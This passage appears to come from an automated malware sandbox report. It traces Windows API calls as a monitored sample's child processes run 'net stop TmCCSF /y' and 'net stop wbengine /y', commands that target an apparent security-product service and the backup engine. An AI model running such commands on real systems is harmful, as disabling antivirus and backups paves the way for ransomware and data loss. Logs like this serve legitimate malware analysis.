AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 149 os_tid = 0x894 Process: id = "82" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x469d0000" os_pid = "0x86c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "81" os_parent_pid = "0x85c" cmd_line = "C:\\Windows\\system32\\net1 stop TmCCSF /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 150 os_tid = 0x870 [0045.271] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ef810 | out: lpSystemTimeAsFileTime=0x1ef810*(dwLowDateTime=0xe52f14e0, dwHighDateTime=0x1d57a86)) [0045.271] GetCurrentProcessId () returned 0x86c [0045.271] GetCurrentThreadId () returned 0x870 [0045.271] GetTickCount () returned 0x114648d [0045.271] QueryPerformanceCounter (in: lpPerformanceCount=0x1ef808 | out: lpPerformanceCount=0x1ef808*=16555560313) returned 1 [0045.271] GetModuleHandleA (lpModuleName=0x0) returned 0x650000 [0045.271] __set_app_type (_Type=0x1) [0045.271] __p__fmode () returned 0x74eb31f4 [0045.271] __p__commode () returned 0x74eb31fc [0045.271] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x65ffe6) returned 0x0 [0045.272] __getmainargs (in: _Argc=0x669064, _Argv=0x66906c, _Env=0x669068, _DoWildCard=0, _StartInfo=0x669024 | out: _Argc=0x669064, _Argv=0x66906c, _Env=0x669068) returned 0 [0045.272] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0045.272] GetConsoleOutputCP () returned 0x1b5 [0045.279] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x669080 | out: lpCPInfo=0x669080) returned 1 [0045.305] SetThreadUILanguage (LangId=0x0) returned 0x409 [0045.308] sprintf_s (in: _DstBuf=0x1ef7c8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0045.308] setlocale (category=0, locale=".437") returned="English_United States.437" [0045.310] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0045.310] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0045.310] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop TmCCSF /y" [0045.310] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1ef594, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0045.310] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x60) returned 0x253c00 [0045.310] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0045.310] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1ef798 | out: Buffer=0x1ef798*=0x251c60) returned 0x0 [0045.310] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1ef798 | out: Buffer=0x1ef798*=0x251c78) returned 0x0 [0045.311] _fileno (_File=0x74eb2900) returned -2 [0045.311] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0045.311] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0045.311] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0045.311] _wcsicmp (_String1="config", _String2="stop") returned -16 [0045.311] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0045.311] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0045.311] _wcsicmp (_String1="file", _String2="stop") returned -13 [0045.311] _wcsicmp (_String1="files", _String2="stop") returned -13 [0045.311] _wcsicmp (_String1="group", _String2="stop") returned -12 [0045.311] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0045.311] _wcsicmp (_String1="help", _String2="stop") returned -11 [0045.311] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0045.311] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0045.311] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0045.311] _wcsicmp (_String1="session", _String2="stop") returned -15 [0045.311] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0045.311] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0045.311] _wcsicmp (_String1="share", _String2="stop") returned -12 [0045.311] _wcsicmp (_String1="start", _String2="stop") returned -14 [0045.311] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0045.311] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0045.311] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0045.311] _wcsicmp (_String1="accounts", _String2="TmCCSF") returned -19 [0045.311] _wcsicmp (_String1="computer", _String2="TmCCSF") returned -17 [0045.311] _wcsicmp (_String1="config", _String2="TmCCSF") returned -17 [0045.311] _wcsicmp (_String1="continue", _String2="TmCCSF") returned -17 [0045.311] _wcsicmp (_String1="cont", _String2="TmCCSF") returned -17 [0045.311] _wcsicmp (_String1="file", _String2="TmCCSF") returned -14 [0045.311] _wcsicmp (_String1="files", _String2="TmCCSF") returned -14 [0045.311] _wcsicmp (_String1="group", _String2="TmCCSF") returned -13 [0045.311] _wcsicmp (_String1="groups", _String2="TmCCSF") returned -13 [0045.311] _wcsicmp (_String1="help", _String2="TmCCSF") returned -12 [0045.312] _wcsicmp (_String1="helpmsg", _String2="TmCCSF") returned -12 [0045.312] _wcsicmp (_String1="localgroup", _String2="TmCCSF") returned -8 [0045.312] _wcsicmp (_String1="pause", _String2="TmCCSF") returned -4 [0045.312] _wcsicmp (_String1="session", _String2="TmCCSF") returned -1 [0045.312] _wcsicmp (_String1="sessions", _String2="TmCCSF") returned -1 [0045.312] _wcsicmp (_String1="sess", _String2="TmCCSF") returned -1 [0045.312] _wcsicmp (_String1="share", _String2="TmCCSF") returned -1 [0045.312] _wcsicmp (_String1="start", _String2="TmCCSF") returned -1 [0045.312] _wcsicmp (_String1="stats", _String2="TmCCSF") returned -1 [0045.312] _wcsicmp (_String1="statistics", _String2="TmCCSF") returned -1 [0045.312] _wcsicmp (_String1="stop", _String2="TmCCSF") returned -1 [0045.312] _wcsicmp (_String1="time", _String2="TmCCSF") returned -4 [0045.312] _wcsicmp (_String1="user", _String2="TmCCSF") returned 1 [0045.312] _wcsicmp (_String1="users", _String2="TmCCSF") returned 1 [0045.312] _wcsicmp (_String1="msg", _String2="TmCCSF") returned -7 [0045.312] _wcsicmp (_String1="messenger", _String2="TmCCSF") returned -7 [0045.312] _wcsicmp (_String1="receiver", _String2="TmCCSF") returned -2 [0045.312] _wcsicmp (_String1="rcv", _String2="TmCCSF") returned -2 [0045.312] _wcsicmp (_String1="netpopup", _String2="TmCCSF") returned -6 [0045.312] _wcsicmp (_String1="redirector", _String2="TmCCSF") returned -2 [0045.312] _wcsicmp (_String1="redir", _String2="TmCCSF") returned -2 [0045.312] _wcsicmp (_String1="rdr", _String2="TmCCSF") returned -2 [0045.312] _wcsicmp (_String1="workstation", _String2="TmCCSF") returned 3 [0045.312] _wcsicmp (_String1="work", _String2="TmCCSF") returned 3 [0045.312] _wcsicmp (_String1="wksta", _String2="TmCCSF") returned 3 [0045.312] _wcsicmp (_String1="prdr", _String2="TmCCSF") returned -4 [0045.312] _wcsicmp (_String1="devrdr", _String2="TmCCSF") returned -16 [0045.312] _wcsicmp (_String1="lanmanworkstation", _String2="TmCCSF") returned -8 [0045.312] _wcsicmp (_String1="server", _String2="TmCCSF") returned -1 [0045.312] _wcsicmp (_String1="svr", _String2="TmCCSF") returned -1 [0045.312] _wcsicmp (_String1="srv", _String2="TmCCSF") returned -1 [0045.312] _wcsicmp (_String1="lanmanserver", _String2="TmCCSF") returned -8 [0045.312] _wcsicmp (_String1="alerter", _String2="TmCCSF") returned -19 [0045.312] _wcsicmp (_String1="netlogon", _String2="TmCCSF") returned -6 [0045.313] _wcsupr (in: _String="TmCCSF" | out: _String="TMCCSF") returned="TMCCSF" [0045.313] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2554b0 [0045.315] GetServiceKeyNameW (in: hSCManager=0x2554b0, lpDisplayName="TMCCSF", lpServiceName=0x66aaf0, lpcchBuffer=0x1ef734 | out: lpServiceName="", lpcchBuffer=0x1ef734) returned 0 [0045.316] _wcsicmp (_String1="msg", _String2="TMCCSF") returned -7 [0045.316] _wcsicmp (_String1="messenger", _String2="TMCCSF") returned -7 [0045.316] _wcsicmp (_String1="receiver", _String2="TMCCSF") returned -2 [0045.316] _wcsicmp (_String1="rcv", _String2="TMCCSF") returned -2 [0045.316] _wcsicmp (_String1="redirector", _String2="TMCCSF") returned -2 [0045.316] _wcsicmp (_String1="redir", _String2="TMCCSF") returned -2 [0045.316] _wcsicmp (_String1="rdr", _String2="TMCCSF") returned -2 [0045.316] _wcsicmp (_String1="workstation", _String2="TMCCSF") returned 3 [0045.316] _wcsicmp (_String1="work", _String2="TMCCSF") returned 3 [0045.316] _wcsicmp (_String1="wksta", _String2="TMCCSF") returned 3 [0045.316] _wcsicmp (_String1="prdr", _String2="TMCCSF") returned -4 [0045.316] _wcsicmp (_String1="devrdr", _String2="TMCCSF") returned -16 [0045.316] _wcsicmp (_String1="lanmanworkstation", _String2="TMCCSF") returned -8 [0045.316] _wcsicmp (_String1="server", _String2="TMCCSF") returned -1 [0045.316] _wcsicmp (_String1="svr", _String2="TMCCSF") returned -1 [0045.316] _wcsicmp (_String1="srv", _String2="TMCCSF") returned -1 [0045.316] _wcsicmp (_String1="lanmanserver", _String2="TMCCSF") returned -8 [0045.316] _wcsicmp (_String1="alerter", _String2="TMCCSF") returned -19 [0045.316] _wcsicmp (_String1="netlogon", _String2="TMCCSF") returned -6 [0045.316] NetServiceControl (in: servername=0x0, service="TMCCSF", opcode=0x0, arg=0x0, bufptr=0x1ef730 | out: bufptr=0x1ef730) returned 0x889 [0045.317] wcscpy_s (in: _Destination=0x66a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0045.317] LoadLibraryW (lpLibFileName="NETMSG") returned 0x73ef0000 [0045.318] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x73ef0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x66b338, nSize=0x800, Arguments=0x669dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0045.324] GetFileType (hFile=0x26c) returned 0x3 [0045.325] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x253fe0 [0045.325] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x253fe0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0045.325] WriteFile (in: hFile=0x26c, lpBuffer=0x253fe0*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x1ef670, lpOverlapped=0x0 | out: lpBuffer=0x253fe0*, lpNumberOfBytesWritten=0x1ef670*=0x1e, lpOverlapped=0x0) returned 1 [0045.325] LocalFree (hMem=0x253fe0) returned 0x0 [0045.327] GetFileType (hFile=0x26c) returned 0x3 [0045.327] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x256288 [0045.327] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x256288, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n%", lpUsedDefaultChar=0x0) returned 2 [0045.327] WriteFile (in: hFile=0x26c, lpBuffer=0x256288*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1ef670, lpOverlapped=0x0 | out: lpBuffer=0x256288*, lpNumberOfBytesWritten=0x1ef670*=0x2, lpOverlapped=0x0) returned 1 [0045.329] LocalFree (hMem=0x256288) returned 0x0 [0045.329] _ultow (in: _Dest=0x889, _Radix=2029216 | out: _Dest=0x889) returned="2185" [0045.329] FormatMessageW (in: dwFlags=0x2800, lpSource=0x73ef0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x66b338, nSize=0x800, Arguments=0x669dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0045.332] GetFileType (hFile=0x26c) returned 0x3 [0045.332] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x256288 [0045.333] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x256288, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0045.333] WriteFile (in: hFile=0x26c, lpBuffer=0x256288*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1ef67c, lpOverlapped=0x0 | out: lpBuffer=0x256288*, lpNumberOfBytesWritten=0x1ef67c*=0x34, lpOverlapped=0x0) returned 1 [0045.333] LocalFree (hMem=0x256288) returned 0x0 [0045.333] GetFileType (hFile=0x26c) returned 0x3 [0045.333] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x256288 [0045.333] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x256288, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n%", lpUsedDefaultChar=0x0) returned 2 [0045.333] WriteFile (in: hFile=0x26c, lpBuffer=0x256288*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1ef67c, lpOverlapped=0x0 | out: lpBuffer=0x256288*, lpNumberOfBytesWritten=0x1ef67c*=0x2, lpOverlapped=0x0) returned 1 [0045.333] LocalFree (hMem=0x256288) returned 0x0 [0045.333] NetApiBufferFree (Buffer=0x251c60) returned 0x0 [0045.333] NetApiBufferFree (Buffer=0x251c78) returned 0x0 [0045.333] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop TmCCSF /y" [0045.333] exit (_Code=2) Process: id = "83" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x47ba5000" os_pid = "0x83c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop wbengine /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 151 os_tid = 0x838 Process: id = "84" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x47065000" os_pid = "0x890" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "83" os_parent_pid = "0x83c" cmd_line = "C:\\Windows\\system32\\net1 stop wbengine /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 152 os_tid = 0x88c [0045.564] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x23fec4 | out: lpSystemTimeAsFileTime=0x23fec4*(dwLowDateTime=0xe55c4f00, dwHighDateTime=0x1d57a86)) [0045.564] GetCurrentProcessId () returned 0x890 [0045.564] GetCurrentThreadId () returned 0x88c [0045.564] GetTickCount () returned 0x11465b6 [0045.564] QueryPerformanceCounter (in: lpPerformanceCount=0x23febc | out: lpPerformanceCount=0x23febc*=16584861925) returned 1 [0045.564] GetModuleHandleA (lpModuleName=0x0) returned 0x910000 [0045.564] __set_app_type (_Type=0x1) [0045.564] __p__fmode () returned 0x74eb31f4 [0045.564] __p__commode () returned 0x74eb31fc [0045.564] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x91ffe6) returned 0x0 [0045.565] __getmainargs (in: _Argc=0x929064, _Argv=0x92906c, _Env=0x929068, _DoWildCard=0, _StartInfo=0x929024 | out: _Argc=0x929064, _Argv=0x92906c, _Env=0x929068) returned 0 [0045.565] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0045.565] GetConsoleOutputCP () returned 0x1b5 [0045.565] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x929080 | out: lpCPInfo=0x929080) returned 1 [0045.565] SetThreadUILanguage (LangId=0x0) returned 0x409 [0045.568] sprintf_s (in: _DstBuf=0x23fe7c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0045.568] setlocale (category=0, locale=".437") returned="English_United States.437" [0045.570] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0045.570] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0045.570] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop wbengine /y" [0045.570] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x23fc48, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0045.570] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x64) returned 0x433c00 [0045.570] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0045.571] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x23fe4c | out: Buffer=0x23fe4c*=0x431c60) returned 0x0 [0045.571] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x23fe4c | out: Buffer=0x23fe4c*=0x431c78) returned 0x0 [0045.571] _fileno (_File=0x74eb2900) returned -2 [0045.571] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0045.571] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0045.571] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0045.571] _wcsicmp (_String1="config", _String2="stop") returned -16 [0045.571] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0045.571] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0045.571] _wcsicmp (_String1="file", _String2="stop") returned -13 [0045.571] _wcsicmp (_String1="files", _String2="stop") returned -13 [0045.571] _wcsicmp (_String1="group", _String2="stop") returned -12 [0045.571] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0045.571] _wcsicmp (_String1="help", _String2="stop") returned -11 [0045.571] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0045.571] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0045.571] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0045.571] _wcsicmp (_String1="session", _String2="stop") returned -15 [0045.571] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0045.571] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0045.571] _wcsicmp (_String1="share", _String2="stop") returned -12 [0045.571] _wcsicmp (_String1="start", _String2="stop") returned -14 [0045.571] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0045.571] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0045.571] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0045.571] _wcsicmp (_String1="accounts", _String2="wbengine") returned -22 [0045.571] _wcsicmp (_String1="computer", _String2="wbengine") returned -20 [0045.571] _wcsicmp (_String1="config", _String2="wbengine") returned -20 [0045.571] _wcsicmp (_String1="continue", _String2="wbengine") returned -20 [0045.572] _wcsicmp (_String1="cont", _String2="wbengine") returned -20 [0045.572] _wcsicmp (_String1="file", _String2="wbengine") returned -17 [0045.572] _wcsicmp (_String1="files", _String2="wbengine") returned -17 [0045.572] _wcsicmp (_String1="group", _String2="wbengine") returned -16 [0045.572] _wcsicmp (_String1="groups", _String2="wbengine") returned -16 [0045.572] _wcsicmp (_String1="help", _String2="wbengine") returned -15 [0045.572] _wcsicmp (_String1="helpmsg", _String2="wbengine") returned -15 [0045.572] _wcsicmp (_String1="localgroup", _String2="wbengine") returned -11 [0045.572] _wcsicmp (_String1="pause", _String2="wbengine") returned -7 [0045.572] _wcsicmp (_String1="session", _String2="wbengine") returned -4 [0045.572] _wcsicmp (_String1="sessions", _String2="wbengine") returned -4 [0045.572] _wcsicmp (_String1="sess", _String2="wbengine") returned -4 [0045.572] _wcsicmp (_String1="share", _String2="wbengine") returned -4 [0045.572] _wcsicmp (_String1="start", _String2="wbengine") returned -4 [0045.572] _wcsicmp (_String1="stats", _String2="wbengine") returned -4 [0045.572] _wcsicmp (_String1="statistics", _String2="wbengine") returned -4 [0045.572] _wcsicmp (_String1="stop", _String2="wbengine") returned -4 [0045.572] _wcsicmp (_String1="time", _String2="wbengine") returned -3 [0045.572] _wcsicmp (_String1="user", _String2="wbengine") returned -2 [0045.572] _wcsicmp (_String1="users", _String2="wbengine") returned -2 [0045.572] _wcsicmp (_String1="msg", _String2="wbengine") returned -10 [0045.572] _wcsicmp (_String1="messenger", _String2="wbengine") returned -10 [0045.572] _wcsicmp (_String1="receiver", _String2="wbengine") returned -5 [0045.572] _wcsicmp (_String1="rcv", _String2="wbengine") returned -5 [0045.572] _wcsicmp (_String1="netpopup", _String2="wbengine") returned -9 [0045.572] _wcsicmp (_String1="redirector", _String2="wbengine") returned -5 [0045.572] _wcsicmp (_String1="redir", _String2="wbengine") returned -5 [0045.572] _wcsicmp (_String1="rdr", _String2="wbengine") returned -5 [0045.572] _wcsicmp (_String1="workstation", _String2="wbengine") returned 13 [0045.572] _wcsicmp (_String1="work", _String2="wbengine") returned 13 [0045.572] _wcsicmp (_String1="wksta", _String2="wbengine") returned 9 [0045.572] _wcsicmp (_String1="prdr", _String2="wbengine") returned -7 [0045.572] _wcsicmp (_String1="devrdr", _String2="wbengine") returned -19 [0045.572] _wcsicmp (_String1="lanmanworkstation", _String2="wbengine") returned -11 [0045.572] _wcsicmp (_String1="server", _String2="wbengine") returned -4 [0045.572] _wcsicmp (_String1="svr", _String2="wbengine") returned -4 [0045.572] _wcsicmp (_String1="srv", _String2="wbengine") returned -4 [0045.572] _wcsicmp (_String1="lanmanserver", _String2="wbengine") returned -11 [0045.573] _wcsicmp (_String1="alerter", _String2="wbengine") returned -22 [0045.573] _wcsicmp (_String1="netlogon", _String2="wbengine") returned -9 [0045.573] _wcsupr (in: _String="wbengine" | out: _String="WBENGINE") returned="WBENGINE" [0045.573] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4354b8 [0045.576] GetServiceKeyNameW (in: hSCManager=0x4354b8, lpDisplayName="WBENGINE", lpServiceName=0x92aaf0, lpcchBuffer=0x23fde8 | out: lpServiceName="", lpcchBuffer=0x23fde8) returned 0 [0045.576] _wcsicmp (_String1="msg", _String2="WBENGINE") returned -10 [0045.576] _wcsicmp (_String1="messenger", _String2="WBENGINE") returned -10 [0045.576] _wcsicmp (_String1="receiver", _String2="WBENGINE") returned -5 [0045.576] _wcsicmp (_String1="rcv", _String2="WBENGINE") returned -5 [0045.576] _wcsicmp (_String1="redirector", _String2="WBENGINE") returned -5 [0045.576] _wcsicmp (_String1="redir", _String2="WBENGINE") returned -5 [0045.576] _wcsicmp (_String1="rdr", _String2="WBENGINE") returned -5 [0045.576] _wcsicmp (_String1="workstation", _String2="WBENGINE") returned 13 [0045.576] _wcsicmp (_String1="work", _String2="WBENGINE") returned 13 [0045.576] _wcsicmp (_String1="wksta", _String2="WBENGINE") returned 9 [0045.576] _wcsicmp (_String1="prdr", _String2="WBENGINE") returned -7 [0045.576] _wcsicmp (_String1="devrdr", _String2="WBENGINE") returned -19 [0045.576] _wcsicmp (_String1="lanmanworkstation", _String2="WBENGINE") returned -11 [0045.576] _wcsicmp (_String1="server", _String2="WBENGINE") returned -4 [0045.576] _wcsicmp (_String1="svr", _String2="WBENGINE") returned -4 [0045.576] _wcsicmp (_String1="srv", _String2="WBENGINE") returned -4 [0045.577] _wcsicmp (_String1="lanmanserver", _String2="WBENGINE") returned -11 [0045.577] _wcsicmp (_String1="alerter", _String2="WBENGINE") returned -22 [0045.577] _wcsicmp (_String1="netlogon", _String2="WBENGINE") returned -9 [0045.577] NetServiceControl (in: servername=0x0, service="WBENGINE", opcode=0x0, arg=0x0, bufptr=0x23fde4 | out: bufptr=0x23fde4) returned 0x0 [0045.578] NetApiBufferAllocate (in: ByteCount=0xfa0, Buffer=0x23fdc0 | out: Buffer=0x23fdc0*=0x437868) returned 0x0 [0045.578] OpenServiceW (hSCManager=0x4354b8, lpServiceName="WBENGINE", dwDesiredAccess=0xc) returned 0x4355d0 [0045.578] QueryServiceStatus (in: hService=0x4355d0, lpServiceStatus=0x23fd94 | out: lpServiceStatus=0x23fd94*(dwServiceType=0x10, dwCurrentState=0x1, dwControlsAccepted=0x0, dwWin32ExitCode=0x435, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0045.578] GetServiceDisplayNameW (in: hSCManager=0x4354b8, lpServiceName="WBENGINE", lpDisplayName=0x931fc0, lpcchBuffer=0x23fd78 | out: lpDisplayName="Block Level Backup Engine Service", lpcchBuffer=0x23fd78) returned 1 [0045.579] NetApiBufferFree (Buffer=0x437868) returned 0x0 [0045.579] CloseServiceHandle (hSCObject=0x4355d0) returned 1 [0045.579] wcscpy_s (in: _Destination=0x92a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0045.579] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74770000 [0045.589] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74770000, dwMessageId=0xdc1, dwLanguageId=0x0, lpBuffer=0x92b338, nSize=0x800, Arguments=0x929dd8 | out: lpBuffer="The Block Level Backup Engine Service service is not started.\r\n") returned 0x3f [0045.591] GetFileType (hFile=0x26c) returned 0x3 [0045.591] LocalAlloc (uFlags=0x0, uBytes=0x7e) returned 0x436270 [0045.591] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The Block Level Backup Engine Service service is not started.\r\n", cchWideChar=63, lpMultiByteStr=0x436270, cbMultiByte=126, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The Block Level Backup Engine Service service is not started.\r\n", lpUsedDefaultChar=0x0) returned 63 [0045.591] WriteFile (in: hFile=0x26c, lpBuffer=0x436270*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x23fce8, lpOverlapped=0x0 | out: lpBuffer=0x436270*, lpNumberOfBytesWritten=0x23fce8*=0x3f, lpOverlapped=0x0) returned 1 [0045.591] LocalFree (hMem=0x436270) returned 0x0 [0045.591] GetFileType (hFile=0x26c) returned 0x3 [0045.591] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x436270 [0045.591] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x436270, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nC", lpUsedDefaultChar=0x0) returned 2 [0045.591] WriteFile (in: hFile=0x26c, lpBuffer=0x436270*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x23fce8, lpOverlapped=0x0 | out: lpBuffer=0x436270*, lpNumberOfBytesWritten=0x23fce8*=0x2, lpOverlapped=0x0) returned 1 [0045.591] LocalFree (hMem=0x436270) returned 0x0 [0045.591] _ultow (in: _Dest=0xdc1, _Radix=2358552 | out: _Dest=0xdc1) returned="3521" [0045.591] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74770000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x92b338, nSize=0x800, Arguments=0x929dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 3521.\r\n") returned 0x34 [0045.591] GetFileType (hFile=0x26c) returned 0x3 [0045.591] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 